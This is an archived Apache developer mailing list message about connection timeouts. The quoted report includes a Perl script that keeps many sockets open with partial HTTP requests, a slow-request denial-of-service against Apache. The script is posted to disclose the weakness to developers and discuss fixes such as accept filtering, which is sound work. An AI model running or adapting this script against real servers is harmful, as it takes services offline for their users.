httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Paul Querna <c...@force-elite.com>
Subject Re: Timeout for requests
Date Tue, 03 May 2005 18:41:21 GMT
Ivan Barrera A. wrote:
> It doesn't.
> 

How does accept filtering not 'fix' this?  If the http accept filter
enabled on FreeBSD, Apache will never even see those bogus requests.


> 
> Rasmus Lerdorf wrote:
> 
>>Turn on accept filtering and this problem goes away.  Or at least it
>>moves to be a kernel-level issue instead of an Apache one.
>>
>>-Rasmus
>>
>>Ivan Barrera A. wrote:
>>
>>
>>>Hi...
>>>
>>> I'm still fighting (probably for a lost cause.. but my boss ask me to
>>>do this).
>>> In the socket activity there are some troubles dealing with timeouts.
>>>It is pretty easy to Anyone DoS any apache webserver.
>>> I want to propose implementing a request timeout time, or at least a
>>>check for incoming data.
>>>
>>> If you open many sockets to an apache server, you can keep it alive,
>>>and make apache keep it open for a looong time, eating resources. If you
>>>limit the numbers of conecctions per ip, you still can DoS apache using
>>>2 or more other ips.
>>>
>>> All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
>>>relevant options to their lowest value.
>>>
>>>
>>> (one of the common scrips used to kill apache, is apache-squ1rt, i use
>>>this other to test)
>>> Use this perl script to test :
>>>
>>>#!/usr/bin/perl
>>>
>>>my $Child = 150;
>>>my $Sleep = 10;
>>>
>>>use IO::Socket;
>>>use strict;
>>>
>>>my($c);
>>>my(@SOCKET);
>>>my($t);
>>>
>>>local $| = 1;
>>>
>>>$c=0;
>>>for(0..$Child) {
>>>  @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
>>>                                            PeerAddr=> "127.0.0.1:80");
>>>  $c++;
>>>}
>>>
>>>for(0..$Child) {
>>>  if ( defined @SOCKET[$c]) {
>>>    $t = @SOCKET[$c];
>>>    print $t "GET / HTTP/1.1";
>>>  }
>>>}
>>>
>>>
>>>while(1){
>>>  $c=0;
>>>  # For each children
>>>  for(0..$Child) {
>>>    if ( defined @SOCKET[$c]) {
>>>      $t = @SOCKET[$c];
>>>      print $t "host: test.test";
>>>    }
>>>    $c++;
>>>  }
>>>  sleep ($Sleep);
>>>}
>>>
>>>$c=0;
>>>for(0..$Child) {
>>>  close(@SOCKET[$c++]);
>>>}
>>
>>
>>
> 


Mime
View raw message